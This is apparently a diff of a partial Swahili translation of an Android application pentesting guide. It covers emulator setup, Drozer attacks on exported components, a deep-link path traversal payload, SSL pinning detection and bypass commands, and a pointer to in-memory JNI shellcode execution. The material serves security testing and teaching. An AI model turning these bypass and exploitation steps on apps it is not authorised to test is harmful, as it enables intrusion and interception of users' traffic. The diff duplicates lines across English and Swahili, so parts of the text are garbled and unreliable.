Application inaweza kuwa na secrets (API keys, passwords, hidden urls, subdomains...) ndani yake ambazo unaweza kugundua. Unaweza kutumia zana kama [https://github.com/dwisiswant0/apkleaks](https://github.com/dwisiswant0/apkleaks)
### Bypass Biometric Authentication
@ -222,6 +222,11 @@ bypass-biometric-authentication-android.md
- **Send SMSs**: `sendTextMessage, sendMultipartTestMessage`
- **Native functions** declared as `native`: `public native, System.loadLibrary, System.load`
- [Read this to learn **how to reverse native functions**](reversing-native-libraries.md)
- In-memory native code execution via JNI (downloaded shellcode → mmap/mprotect → call):
{{#ref}}
in-memory-jni-shellcode-execution.md
{{#endref}}
### **Other tricks**
@ -234,56 +239,56 @@ content-protocol.md
---
## Dynamic Analysis
## Uchambuzi wa Dinamiki
> First of all, you need an environment where you can install the application and all the environment (Burp CA cert, Drozer and Frida mainly). Therefore, a rooted device (emulated or not) is extremely recommended.
> Kwanza kabisa, unahitaji mazingira ambapo unaweza kusanidi application na mazingira yote (Burp CA cert, Drozer na Frida hasa). Kwa hivyo, kifaa kilicho rooted (emulated au sio) kinapendekezwa sana.
### Online Dynamic analysis
You can create a **free account** in: [https://appetize.io/](https://appetize.io). This platform allows you to **upload** and **execute** APKs, so it is useful to see how an apk is behaving.
Unaweza kuunda **free account** kwenye: [https://appetize.io/](https://appetize.io). Jukwaa hili linakuwezesha **upload** na **execute** APKs, hivyo ni muhimu kuona jinsi apk inavyotendeka.
You can even **see the logs of your application** in the web and connect through **adb**.
Unaweza hata **kuona logs za application yako** kwenye wavuti na kuungana kupitia **adb**.
![](<../../images/image (831).png>)
Thanks to the ADB connection you can use **Drozer** and **Frida** inside the emulators.
Shukrani kwa muunganisho wa ADB unaweza kutumia **Drozer** na **Frida** ndani ya emulators.
### Local Dynamic Analysis
#### Using an emulator
- [**Android Studio**](https://developer.android.com/studio) (You can create **x86** and **arm** devices, and according to [**this** ](https://android-developers.googleblog.com/2020/03/run-arm-apps-on-android-emulator.html)**latest x86** versions **support ARM libraries** without needing an slow arm emulator).
- Learn to set it up in this page:
- [**Android Studio**](https://developer.android.com/studio) (Unaweza kuunda **x86** na **arm** devices, na kulingana na [**hii**](https://android-developers.googleblog.com/2020/03/run-arm-apps-on-android-emulator.html)**latest x86** versions **support ARM libraries** bila kuhitaji emulator ya arm ambayo ni polepole).
- Jifunze jinsi ya kuisanidi kwenye ukurasa huu:
{{#ref}}
avd-android-virtual-device.md
{{#endref}}
- [**Genymotion**](https://www.genymotion.com/fun-zone/) **(Free version:** Personal Edition, you need to create an account. _It's recommend to **download** the version **WITH**_ _**VirtualBox** to avoid potential errors._)
- [**Nox**](https://es.bignox.com) (Free, but it doesn't support Frida or Drozer).
- [**Genymotion**](https://www.genymotion.com/fun-zone/) **(Free version:** Personal Edition, utahitaji kuunda account. _Inapendekezwa **download** toleo **WITH** _**VirtualBox** ili kuepuka makosa yanayoweza kutokea._)
- [**Nox**](https://es.bignox.com) (Free, lakini haitegemei Frida au Drozer).
> [!TIP]
> When creating a new emulator on any platform remember that the bigger the screen is, the slower the emulator will run. So select small screens if possible.
> Unapotengeneza emulator mpya kwenye jukwaa lolote kumbuka kuwa skrini kubwa inafanya emulator kuwa polepole. Hivyo chagua skrini ndogo inapowezekana.
To **install google services** (like AppStore) in Genymotion you need to click on the red marked button of the following image:
Ili **install google services** (kama AppStore) kwenye Genymotion unahitaji kubofya kitufe kilicho alama nyekundu kwenye picha ifuatayo:
![](<../../images/image (277).png>)
Also, notice that in the **configuration of the Android VM in Genymotion** you can select **Bridge Network mode** (this will be useful if you will be connecting to the Android VM from a different VM with the tools).
Pia, kumbuka kwamba katika **configuration ya Android VM katika Genymotion** unaweza kuchagua **Bridge Network mode** (hii itakuwa muhimu ikiwa utakuwa unahitaji kuungana na Android VM kutoka VM tofauti yenye zana).
#### Use a physical device
Unahitaji kuwezesha chaguo za **debugging** na itakuwa vizuri kama utaweza kuziroot:
Unahitaji kuwasha options za **debugging** na itakuwa vizuri ikiwa unaweza kuiroot:
1. **Settings**.
2. (FromAndroid 8.0) Select **System**.
3. Select **About phone**.
4. Press **Build number** 7 times.
5. Go back and you will find the **Developer options**.
5. Rudi nyuma na utapata **Developer options**.
> Once you have installed the application, the first thing you should do is to try it and investigate what does it do, how does it work and get comfortable with it.\
> I will suggest to **perform this initial dynamic analysis using MobSF dynamic analysis + pidcat**, so we will be able to **learn how the application works** while MobSF **captures** a lot of **interesting** **data** you can review later on.
> Mara tu unapoweka application, jambo la kwanza unalopaswa kufanya ni kuifanyia majaribio na kuchunguza inafanya nini, inafanya kazi vipi na kufahamika nayo.\
> Ninapendekeza **fanya uchambuzi huu wa awali wa dinamik kwa kutumia MobSF dynamic analysis + pidcat**, hivyo tutakuwa na uwezo wa **kujifunza jinsi application inavyofanya kazi** wakati MobSF **inachukua** data nyingi **zazovutia** ambazo unaweza kupitia baadaye.
Magisk/Zygisk quick notes (recommended on Pixel devices)
- Patch boot.img with the Magisk app and flash via fastboot to get systemless root
@ -297,102 +302,102 @@ Magisk/Zygisk quick notes (recommended on Pixel devices)
**Logging**
Wdevelopers wanapaswa kuwa waangalifu kuhusu kufichua **debugging information** hadharani, kwa kuwa inaweza kusababisha data nyeti ku-leak. Vifaa kama [**pidcat**](https://github.com/JakeWharton/pidcat) na `adb logcat` zinapendekezwa kufuatilia logs za application ili kubaini na kulinda taarifa nyeti. **Pidcat** inapendekezwa kwa urahisi wake na usomaji.
Watengenezaji wanapaswa kuwa waangalifu kuhusu kuonyesha **debugging information** hadharani, kwa kuwa inaweza kusababisha data nyeti ku-leak. Zana za [**pidcat**](https://github.com/JakeWharton/pidcat) na `adb logcat` zinapendekezwa kwa kusimamia logs za application ili kubaini na kulinda taarifa nyeti. **Pidcat** inapendekezwa kwa urahisi wake wa matumizi na ufasaha wa kuonekana.
> [!WARNING]
> Note that from **later newer than Android 4.0**, **applications are only able to access their own logs**. So applications cannot access other apps logs.\
> Anyway, it's still recommended to **not log sensitive information**.
> Kumbuka kwamba tangu **toleo za baadaye za Android juu ya 4.0**, **applications zinaweza kupiga logs za programu zao tu**. Hivyo applications haziwezi kupata logs za apps nyingine.\
> Hata hivyo, bado inashauriwa **kuto-log taarifa nyeti**.
**Copy/Paste Buffer Caching**
Mfumo wa Android unaotegemea **clipboard** unaruhusu utendaji wa copy-paste ndani ya apps, lakini unaweka hatari kwani **apps zingine** zinaweza **access** clipboard, na hivyo kuweza ku-expose data nyeti. Ni muhimu **kuzima** vitendo vya copy/paste kwa sehemu nyeti za app, kama maelezo ya kadi za mkopo, ili kuzuia data ku-leak.
Mfumo wa Android unaotegemea **clipboard** unawezesha utendaji wa copy-paste katika apps, lakini una hatari kwani **applications nyingine** zinaweza **kupata** clipboard, na hivyo kuonyesha data nyeti. Ni muhimu **kuzima copy/paste** kwa sehemu nyeti za application, kama maelezo ya kadi za mkopo, ili kuzuia leak ya data.
**Crash Logs**
Kama application inakufa (crash) na **kuhifadhi logs**, logs hizi zinaweza kumsaidia attacker, hasa pale ambapo application haiwezi kureverse-engineered. Ili kupunguza hatari hii, epuka logging kwenye crash, na kama logs lazima zitumwe kwenye network, hakikisha zitatumwa kwa channel ya SSL kwa usalama.
Ikiwa application **inaanguka (crashes)** na **inahifadhi logs**, logs hizi zinaweza kumsaidia mshambuliaji, hasa pale application haiwezi ku-reverse-engineered. Ili kupunguza hatari hii, epuka ku-log wakati wa crashes, na kama logs lazima zitumwe mtandaoni, hakikisha zinatumwa kupitia channel ya SSL kwa usalama.
Kama pentester, **try to take a look to these logs**.
Kama pentester, **jaribu kuangalia logs hizi**.
**Analytics Data Sent To 3rd Parties**
Applications mara nyingi huingiza services kama Google Adsense, ambazo kwa utekelezaji mbaya zinaweza kwa bahati mbaya **leak sensitive data**. Ili kubaini potential data leaks, inashauriwa **kuintercept traffic ya application** na kuangalia kama taarifa nyeti zinatumwa kwa third-party services.
Applications mara nyingi hujumuisha huduma kama Google Adsense, ambazo kwa kutokukamilika kwa utekelezaji wa watengenezaji zinaweza kwa bahati mbaya leak sensitive data. Ili kubaini leak za data zinazowezekana, inashauriwa **kuingilia (intercept) trafiki ya application** na kuangalia kama kuna taarifa nyeti zinatumiwa kwenda kwa huduma za wa tatu.
### SQLite DBs
Most of the applications will use **internal SQLite databases** to save information. During the pentest take a **look** to the **databases** created, the names of **tables** and **columns** and all the **data** saved because you could find **sensitive information** (which would be a vulnerability).\
Databases should be located in `/data/data/the.package.name/databases` like `/data/data/com.mwr.example.sieve/databases`
Mara nyingi applications hutatumia **internal SQLite databases** kuhifadhi taarifa. Wakati wa pentest angalia **databases** zilizoundwa, majina ya **tables** na **columns** na data zote zilizohifadhiwa kwani unaweza kupata **taarifa nyeti** (ambayo itakuwa udhaifu).\
Databases zinapaswa kuwa katika `/data/data/the.package.name/databases` kama `/data/data/com.mwr.example.sieve/databases`
If the database is saving confidential information and is **encrypted b**ut you can **find** the **password** inside the application it's still a **vulnerability**.
Ikiwa database inahifadhi taarifa za siri na ime-**encrypted** lakini unaweza **kupata** password ndani ya application bado ni **udhaifu**.
Enumerate the tables using `.tables` and enumerate the columns of the tables doing `.schema <table_name>`
Orodhesha tables kwa kutumia `.tables` na orodhesha columns za tables kwa kufanya `.schema <table_name>`
### Drozer (Exploit Activities, Content Providers and Services)
From [Drozer Docs](https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf): **Drozer** allows you to **assume the role of an Android app** and interact with other apps. It can do **anything that an installed application can do**, such as make use of Androids Inter-Process Communication (IPC) mechanism and interact with the underlying operating system. .\
Drozer is s useful tool to **exploit exported activities, exported services and Content Providers** as you will learn in the following sections.
From [Drozer Docs](https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf): **Drozer** inakuwezesha kuchukua nafasi ya Android app na kuingiliana na apps nyingine. Inaweza kufanya chochote ambacho installed application inaweza kufanya, kama kutumia mfumo wa Androids Inter-Process Communication (IPC) na kuingiliana na operating system iliyopo. .\
Drozer ni zana muhimu ya **kuchukua faida ya exported activities, exported services na Content Providers** kama utakavyojifunza katika sehemu zilizofuata.
### Exploiting exported Activities
[**Read this if you want to refresh what is an Android Activity.**](android-applications-basics.md#launcher-activity-and-other-activities)\
Also remember that the code of an activity starts in the **`onCreate`** method.
Pia kumbuka kwamba code ya activity inaanza katika method ya **`onCreate`**.
**Authorisation bypass**
When an Activity is exported you can invoke its screen from an external app. Therefore, if an activity with **sensitive information** is **exported** you could **bypass** the **authentication** mechanisms **to access it.**
Wakati Activity ime-exported unaweza kuitisha screen yake kutoka app ya nje. Kwa hivyo, ikiwa activity yenye **taarifa nyeti** ime-exported unaweza **bypass** mekanismo za **authentication** ili kufikia.
[**Learn how to exploit exported activities with Drozer.**](drozer-tutorial/index.html#activities)
You can also start an exported activity from adb:
Unaweza pia kuanza exported activity kutoka adb:
- PackageName is com.example.demo
- Exported ActivityName is com.example.test.MainActivity
```bash
adb shell am start -n com.example.demo/com.example.test.MainActivity
```
**NOTE**: MobSF itakutambua kama hatari matumizi ya _**singleTask/singleInstance**_ kama `android:launchMode` katika activity, lakini kutokana na [this](https://github.com/MobSF/Mobile-Security-Framework-MobSF/pull/750), inaonekana hii ni hatari tu kwenye toleo la zamani (API versions < 21).
**NOTE**: MobSF will detect as malicious the use of _**singleTask/singleInstance**_ as `android:launchMode` in an activity, but due to [this](https://github.com/MobSF/Mobile-Security-Framework-MobSF/pull/750), apparently this is only dangerous on old versions (API versions < 21).
> [!TIP]
> Kumbuka kwamba authorisation bypass siyo kila wakati ni vulnerability; itategemea jinsi bypass inavyofanya kazi na ni taarifa gani zinazoonekana.
> Kumbuka kwamba authorisation bypass siyo kila mara ni vulnerability; itategemea jinsi bypass inavyofanya kazi na ni taarifa gani zinazoonyeshwa.
**Sensitive information leakage**
**Activities can also return results**. Ikiwa utafanikiwa kupata exported na unprotected activity inayoitisha method ya **`setResult`** na **kurudisha sensitive information**, kuna sensitive information leakage.
**Activities pia zinaweza kurudisha matokeo**. Ikiwa utaweza kupata activity iliyokuwa exported na isiyolindwa ikitumia method ya **`setResult`** na **kurudisha sensitive information**, kuna sensitive information leakage.
#### Tapjacking
If tapjacking isn't prevented, unaweza kudharau exported activity kufanya **user perform unexpected actions**. Kwa habari zaidi kuhusu [**what is Tapjacking follow the link**](#tapjacking).
Ikiwa Tapjacking haizuizwi, unaweza kutumia exported activity kusababisha **mtumiaji afanye vitendo visivyotarajiwa**. Kwa maelezo zaidi kuhusu [**what is Tapjacking follow the link**](#tapjacking).
### Exploiting Content Providers - Kufikia na kusimamia sensitive information
### Exploiting Content Providers - Accessing and manipulating sensitive information
[**Read this if you want to refresh what is a Content Provider.**](android-applications-basics.md#content-provider)\
Content providers kwa kawaida hutumika kushiriki data. Ikiwa app ina content providers zinapatikana unaweza kuwa na uwezo wa **extract sensitive** data kutoka kwao. Pia ni muhimu kujaribu uwezekano wa **SQL injections** na **Path Traversals** kwani zinaweza kuwa vulnerable.
[**Read this if you want to refresh what is a Content Provider.**](android-applications-basics.md#content-provider)
Content providers kwa msingi hutumiwa **kushiriki data**. Ikiwa app ina content providers zinapatikana unaweza kuwa na uwezo wa **kutoa data nyeti** kutoka kwao. Pia ni vyema kujaribu uwezekano wa **SQL injections** na **Path Traversals**, kwa sababu vinaweza kuwa dhaifu.
[**Learn how to exploit Content Providers with Drozer.**](drozer-tutorial/index.html#content-providers)
### **Exploiting Services**
[**Read this if you want to refresh what is a Service.**](android-applications-basics.md#services)\
Kumbuka kwamba vitendo vya Service huanza katika method `onStartCommand`.
[**Read this if you want to refresh what is a Service.**](android-applications-basics.md#services)
Kumbuka kwamba vitendo vya Service huanza kwenye method `onStartCommand`.
Service kwa msingi ni kitu kinachoweza kupokea data, kuichakata na kurudisha (au la) response. Kwa hiyo, ikiwa application ina exporting services unapaswa kuangalia code ili kuelewa inafanya nini na kuipima kwa dynamically ili kutoa taarifa za siri, kupita vikwazo vya uthibitishaji...
Service kwa msingi ni kitu kinachoweza **kupokea data**, **kuchakata** na **kurudisha** (au la) majibu. Hivyo, ikiwa application ina services zilizochapishwa (exporting) unapaswa **kagua** **code** ili kuelewa inafanya nini na **iteste** kwa njia ya **dynamic** kwa lengo la kupata taarifa za siri, bypassing authentication measures...
[**Learn how to exploit Services with Drozer.**](drozer-tutorial/index.html#services)
### **Exploiting Broadcast Receivers**
[**Read this if you want to refresh what is a Broadcast Receiver.**](android-applications-basics.md#broadcast-receivers)\
Kumbuka kwamba vitendo vya Broadcast Receiver huanza katika method `onReceive`.
[**Read this if you want to refresh what is a Broadcast Receiver.**](android-applications-basics.md#broadcast-receivers)
Kumbuka kwamba vitendo vya Broadcast Receiver huanza kwenye method `onReceive`.
Broadcast receiver itakuwa inasubiri aina ya ujumbe. Kulingana na jinsi receiver inavyoshughulikia ujumbe inaweza kuwa vulnerable.\
Broadcast receiver itakuwa inasubiri aina fulani ya ujumbe. Kutegemea jinsi receiver inavyoshughulikia ujumbe huo inaweza kuwa dhaifu.
[**Learn how to exploit Broadcast Receivers with Drozer.**](#exploiting-broadcast-receivers)
### **Exploiting Schemes / Deep links**
Unaweza kutafuta deep links manually, kwa kutumia tools kama MobSF au scripts kama [this one](https://github.com/ashleykinguk/FBLinkBuilder/blob/master/FBLinkBuilder.py).\
Unaweza **open** declared **scheme** kwa kutumia **adb** au **browser**:
Unaweza kutafuta deep links kwa mkono, ukitumia tools kama MobSF au scripts kama [this one](https://github.com/ashleykinguk/FBLinkBuilder/blob/master/FBLinkBuilder.py).
Unaweza **fungua** scheme iliyotangazwa kwa kutumia **adb** au **browser**:
```bash
adb shell am start -a android.intent.action.VIEW -d "scheme://hostname/path?param=value" [your.package.name]
```
_Tambua kwamba unaweza **kuacha jina la kifurushi** na simu ya rununu itaita moja kwa moja app inayofaa kufungua kiungo hicho._
_Kumbuka kwamba unaweza **omit the package name** na kifaa cha rununu kitaita moja kwa moja app itakayofungua link hiyo._
```html
<!-- Browser regular link -->
<a href="scheme://hostname/path?param=value">Click me</a>
@ -401,56 +406,56 @@ _Tambua kwamba unaweza **kuacha jina la kifurushi** na simu ya rununu itaita moj
```
**Msimbo unaotekelezwa**
Ili kupata **msimbo utakaotekelezwa katika App**, nenda kwenye activity inayoitwa na the deeplink na tafuta function **`onNewIntent`**.
Ili kupata **msimbo utakao endeshwa katika App**, nenda kwa activity inayoitwa na deeplink na tafuta function **`onNewIntent`**.
![](<../../images/image (436) (1) (1) (1).png>)
**Taarifa nyeti**
Kila unapokutana na deep link hakikisha kwamba **haipokei data nyeti (kama passwords) kupitia vigezo vya URL**, kwa sababu programu nyingine yoyote inaweza **kuiga deep link na kuiba data hiyo!**
Kila unapokutana na deep link hakikisha kwamba **haina kupokea data nyeti (kama passwords) kupitia URL parameters**, kwa sababu programu nyingine yoyote inaweza **kuiga deep link na kuiba data hiyo!**
**Vigezo katika path**
**Parameters in path**
Unapaswa pia **kuhakiki kama deep link yoyote inatumia parameter ndani ya path** ya URL kama: `https://api.example.com/v1/users/{username}` , katika hali hiyo unaweza kulazimisha path traversal kwa kufikia kitu kama: `example://app/users?username=../../unwanted-endpoint%3fparam=value` .\
Kumbuka kwamba ukipata endpoints sahihi ndani ya application unaweza kusababisha **Open Redirect** (ikiwa sehemu ya path inatumika kama domain name), **account takeover** (ikiwa unaweza kubadilisha maelezo ya watumiaji bila CSRF token na endpoint iliyo na udhaifu ilitumia method sahihi) na udhaifu mwingine wowote. Habari zaidi [hapa](http://dphoeniixx.com/2020/12/13-2/).
Unapaswa pia kuangalia kama deep link yoyote inatumia parameter ndani ya path ya URL kama: `https://api.example.com/v1/users/{username}` , katika kesi hiyo unaweza kulazimisha path traversal kwa kufikia kitu kama: `example://app/users?username=../../unwanted-endpoint%3fparam=value` .\
Kumbuka kwamba ikiwa utapata endpoints sahihi ndani ya application unaweza kusababisha **Open Redirect** (ikiwa sehemu ya path inatumika kama domain name), **account takeover** (ikiwa unaweza kubadilisha maelezo ya watumiaji bila CSRF token na endpoint iliyo vuln ilitumia method sahihi) na aina nyingine yoyote ya vuln. Taarifa zaidi kuhusu hili [hapa](http://dphoeniixx.com/2020/12/13-2/).
**Mifano zaidi**
**More examples**
Ripoti ya bug bounty yenye kuvutia: [https://hackerone.com/reports/855618](https://hackerone.com/reports/855618) kuhusu links (_/.well-known/assetlinks.json_).
Ripoti ya bug bounty ya kuvutia: [hapa](https://hackerone.com/reports/855618) kuhusu links (_/.well-known/assetlinks.json_).
### Ukaguzi wa Transport Layer na Kushindwa kwa Uthibitishaji
### Ukaguzi wa Transport Layer na Makosa ya Uthibitishaji
- **Vyeti mara nyingi havikaguliwi ipasavyo** na applications za Android. Ni kawaida kwa applications hizi kupuuza onyo na kukubali self-signed certificates au, katika baadhi ya matukio, kurudi kutumia HTTP connections.
- **Mazungumzo wakati wa SSL/TLS handshake mara nyingine huwa dhaifu**, kwa kutumia insecure cipher suites. Udhaifu huu unafanya muunganisho uwe hatarini kwa man-in-the-middle (MITM) attacks, ukiruhusu wadukuzi kufungua encryption ya data.
- **Leakage of private information** ni hatari wakati applications zinathibitisha kwa kutumia channels salama lakini kisha zinasiliana kwa channels zisizo salama kwa ajili ya miamala mingine. Njia hii inashindwa kulinda data nyeti, kama session cookies au maelezo ya watumiaji, dhidi ya kukamatwa na wahalifu.
- **Vyeti hazichunguzwi kila mara ipasavyo** na applications za Android. Ni kawaida kwa applications hizi kupuuza onyo na kukubali self-signed certificates au, katika matukio mengine, kurudi kutumia HTTP connections.
- **Mazungumzo wakati wa SSL/TLS handshake wakati mwingine huwa dhaifu**, zikitumia insecure cipher suites. Udhurumvu huu unafanya connection kuwa nyeti kwa man-in-the-middle (MITM) attacks, kuruhusu attackers kufungua data.
- **Leakage of private information** ni hatari wakati applications zinathibitisha kwa kutumia secure channels lakini kisha kuwasiliana kupitia non-secure channels kwa miamala mingine. Njia hii inashindwa kulinda data nyeti, kama session cookies au maelezo ya mtumiaji, dhidi ya interception na entities zenye nia mbaya.
#### Uhakiki wa vyeti
#### Uthibitishaji wa Cheti
Tutatilia maanani **certificate verification**. Uadilifu wa certificate ya server lazima uthibitishwe ili kuongeza usalama. Hii ni muhimu kwa sababu TLS configurations zisizo salama na uhamishaji wa data nyeti kupitia channels zisizo encrypted vinaweza kuleta hatari kubwa. Kwa hatua za kina juu ya jinsi ya kuthibitisha server certificates na kushughulikia udhaifu, rasilimali hii [**inatoa mwanga**](https://manifestsecurity.com/android-application-security-part-10/).
Tutazingatia **certificate verification**. Lazima integrity ya cheti cha server ithibitishwe ili kuongeza usalama. Hii ni muhimu kwa sababu konfigurishaji zisizo salama za TLS na uwasilishaji wa data nyeti kupitia channels zisizosimbwa zinaweza kuleta hatari kubwa. Kwa hatua za kina za kuthibitisha vyeti vya server na kushughulikia udhaifu, [**rasilimali hii**](https://manifestsecurity.com/android-application-security-part-10/) inatoa mwongozo kamili.
#### SSL Pinning
SSL Pinning ni tahadhari ya usalama ambapo application inathibitisha certificate ya server dhidi ya nakala inayojulikana iliyohifadhiwa ndani ya application yenyewe. Mbinu hii ni muhimu kuzuia MITM attacks. Kutekeleza SSL Pinning kunashauriwa kwa nguvu kwa applications zinazosimamia taarifa nyeti.
SSL Pinning ni hatua ya usalama ambapo application inathibitisha cheti ya server dhidi ya nakala inayojulikana iliyohifadhiwa ndani ya application yenyewe. Njia hii ni muhimu kwa kuzuia MITM attacks. Kutekeleza SSL Pinning kunapendekezwa kwa nguvu kwa applications zinashughulikia taarifa nyeti.
#### Ukaguzi wa Traffic
#### Traffic Inspection
Ili kuchambua HTTP traffic, ni lazima **usakinishe certificate ya chombo cha proxy** (mfano, Burp). Bila kusakinisha certificate hii, traffic iliyosimbwa inaweza isionewe kupitia proxy. Kwa mwongozo wa jinsi ya kusakinisha custom CA certificate, [**bofya hapa**](avd-android-virtual-device.md#install-burp-certificate-on-a-virtual-machine).
Ili kuchunguza HTTP traffic, ni lazima **uishe cheti cha proxy tool** (mfano, Burp). Bila kuisakinisha cheti hiki, trafiki iliyosimbwa inaweza isionekane kupitia proxy. Kwa mwongozo wa kusakinisha custom CA certificate, [**bonyeza hapa**](avd-android-virtual-device.md#install-burp-certificate-on-a-virtual-machine).
Applications zinazolenga **API Level 24 and above** zinahitaji mabadiliko kwenye Network Security Config ili kukubali CA certificate ya proxy. Hatua hii ni muhimu kwa kuchambua traffic iliyosimbwa. Kwa maelekezo ya jinsi ya kubadilisha Network Security Config, [**rejea mwongozo huu**](make-apk-accept-ca-certificate.md).
Applications zinazolenga **API Level 24 and above** zinahitaji marekebisho ya Network Security Config ili kukubali CA certificate ya proxy. Hatua hii ni muhimu kwa kuchunguza trafiki iliyosimbwa. Kwa maelekezo ya kubadilisha Network Security Config, [**rejea tutorial hii**](make-apk-accept-ca-certificate.md).
Ikiwa **Flutter** inatumika unahitaji kufuata maelekezo kwenye [**ukurasa huu**](flutter.md). Hii ni kwa sababu, kuongeza certificate kwenye store peke yake haitafanya kazi kwani Flutter ina orodha yake ya CAs zinazokubalika.
Ikiwa **Flutter** inatumiwa unahitaji kufuata maelekezo katika [**ukurasa huu**](flutter.md). Hii ni kwa sababu, kuongeza tu cheti kwenye store haitafanya kazi kwani Flutter ina orodha yake ya valid CAs.
#### Utambuzi wa static wa SSL/TLS pinning
#### Ugunduzi wa statiki wa SSL/TLS pinning
Kabla ya kujaribu runtime bypasses, panga haraka maeneo ambapo pinning inatekelezwa katika APK. Utambuzi wa static utakusaidia kupanga hooks/patches na kuzingatia code paths sahihi.
Kabla ya kujaribu runtime bypasses, chora haraka ni wapi pinning inatekelezwa ndani ya APK. Ugunduzi wa statiki hukusaidia kupanga hooks/patches na kuzingatia code paths sahihi.
Tool: SSLPinDetect
- Open-source static-analysis utility inayofanya decompile ya APK hadi Smali (kupitia apktool) na kutafuta curated regex patterns za utekelezaji wa SSL/TLS pinning.
- Inaripoti path ya faili kwa usahihi, nambari ya mstari, na kipande cha code kwa kila match.
- Inafunika frameworks za kawaida na code paths za custom: OkHttp CertificatePinner, custom javax.net.ssl.X509TrustManager.checkServerTrusted, SSLContext.init with custom TrustManagers/KeyManagers, na Network Security Config XML pins.
- Open-source utiliti ya uchambuzi wa statiki inayodecompile APK hadi Smali (via apktool) na kutafuta pattern za regex zilizotengwa za utekelezaji wa SSL/TLS pinning.
- Inaripoti path sahihi ya faili, nambari ya mstari, na kipande cha code kwa kila match.
- Inashughulikia frameworks za kawaida na custom code paths: OkHttp CertificatePinner, custom javax.net.ssl.X509TrustManager.checkServerTrusted, SSLContext.init with custom TrustManagers/KeyManagers, and Network Security Config XML pins.
Sakinisha
- Masharti ya awali: Python >= 3.8, Java on PATH, apktool
Install
- Mahitaji ya awali: Python >= 3.8, Java on PATH, apktool
```bash
git clone https://github.com/aancw/SSLPinDetect
cd SSLPinDetect
@ -464,9 +469,8 @@ python sslpindetect.py -f app.apk -a apktool.jar
# Verbose (timings + per-match path:line + snippet)
python sslpindetect.py -a apktool_2.11.0.jar -f sample/app-release.apk -v
```
Mifano ya sheria za muundo (JSON)
Tumia au panua signatures ili kugundua proprietary/custom pinning styles. Unaweza kupakia JSON yako mwenyewe na kutafuta kwa wingi.
Mfano wa kanuni za pattern (JSON)
Tumia au ongeza signatures ili kugundua proprietary/custom pinning styles. Unaweza kupakia JSON yako mwenyewe na scan kwa wingi.
```json
{
"OkHttp Certificate Pinning": [
@ -481,42 +485,42 @@ Tumia au panua signatures ili kugundua proprietary/custom pinning styles. Unawez
}
```
Notes and tips
- Skanning ya haraka kwenye apps kubwa kupitia multi-threading na memory-mapped I/O; regex zilizo pre-compiled hupunguza mzigo/matokeo ya uwongo.
- Kuchanganua haraka kwenye apps kubwa kupitia multi-threading na memory-mapped I/O; pre-compiled regex hupunguza overhead/false positives.
- Pattern collection: https://github.com/aancw/smali-sslpin-patterns
- Malengo ya kawaida ya utambuzi kwa kuchambua ifuatayo:
- OkHttp: CertificatePinner usage, setCertificatePinner, okhttp3/okhttp package references
- Custom TrustManagers: javax.net.ssl.X509TrustManager, checkServerTrusted overrides
- Custom SSL contexts: SSLContext.getInstance + SSLContext.init with custom managers
- Declarative pins in res/xml network security config and manifest references
- Tumia maeneo yaliyolingana kupanga Frida hooks, static patches, au mapitio ya config kabla ya majaribio ya dynamic.
- Malengo ya kawaida ya utambuzi kwa kuchunguza ifuatayo:
- OkHttp: matumizi ya CertificatePinner, setCertificatePinner, okhttp3/okhttp package references
- TrustManagers maalum: javax.net.ssl.X509TrustManager, checkServerTrusted overrides
- SSL contexts maalum: SSLContext.getInstance + SSLContext.init with custom managers
- Pins zilizotangazwa katika res/xml network security config na marejeo ya manifest
- Tumia maeneo yaliyoendana kupanga Frida hooks, static patches, au mapitio ya config kabla ya majaribio ya dynamic.
#### Bypassing SSL Pinning
#### Kuepuka SSL Pinning
When SSL Pinning is implemented, bypassing it becomes necessary to inspect HTTPS traffic. Various methods are available for this purpose:
Wakati SSL Pinning imeanzishwa, kuepuka itakuwa muhimu ili kuchunguza trafiki ya HTTPS. Mbinu mbalimbali zinapatikana kwa madhumuni haya:
- Automatically **modify** the **apk** to **bypass** SSLPinning with [**apk-mitm**](https://github.com/shroudedcode/apk-mitm). The best pro of this option, is that you won't need root to bypass the SSL Pinning, but you will need to delete the application and reinstall the new one, and this won't always work.
- You could use **Frida** (discussed below) to bypass this protection. Here you have a guide to use Burp+Frida+Genymotion: [https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/](https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/)
- You can also try to **automatically bypass SSL Pinning** using [**objection**](frida-tutorial/objection-tutorial.md)**:** `objection --gadget com.package.app explore --startup-command "android sslpinning disable"`
- You can also try to **automatically bypass SSL Pinning** using **MobSF dynamic analysis** (explained below)
- If you still think that there is some traffic that you aren't capturing you can try to **forward the traffic to burp using iptables**. Read this blog: [https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62](https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62)
- Badilisha kwa otomatiki **apk** ili **kuepuka** SSLPinning kwa kutumia [**apk-mitm**](https://github.com/shroudedcode/apk-mitm). Faida kubwa ya chaguo hili ni kwamba hautahitaji root kuepuka SSL Pinning, lakini utahitaji kufuta programu na kusakinisha mpya, na hii si kila wakati itafanya kazi.
- Unaweza kutumia **Frida** (imejadiliwa hapa chini) kuepuka ulinzi huu. Hapa kuna mwongozo wa kutumia Burp+Frida+Genymotion: [https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/](https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/)
- Unaweza pia kujaribu **kuepuka moja kwa moja SSL Pinning** ukitumia [**objection**](frida-tutorial/objection-tutorial.md)**:** `objection --gadget com.package.app explore --startup-command "android sslpinning disable"`
- Unaweza pia kujaribu **kuepuka moja kwa moja SSL Pinning** ukitumia **MobSF dynamic analysis** (imeelezewa hapa chini)
- Ikiwa bado unaona kuna trafiki ambayo hauikamata, unaweza kujaribu **kupeleka trafiki kwa Burp kwa kutumia iptables**. Soma blogu hii: [https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62](https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62)
#### Looking for Common Web Vulnerabilities
#### Kutafuta Udhaifu wa Wavuti wa Kawaida
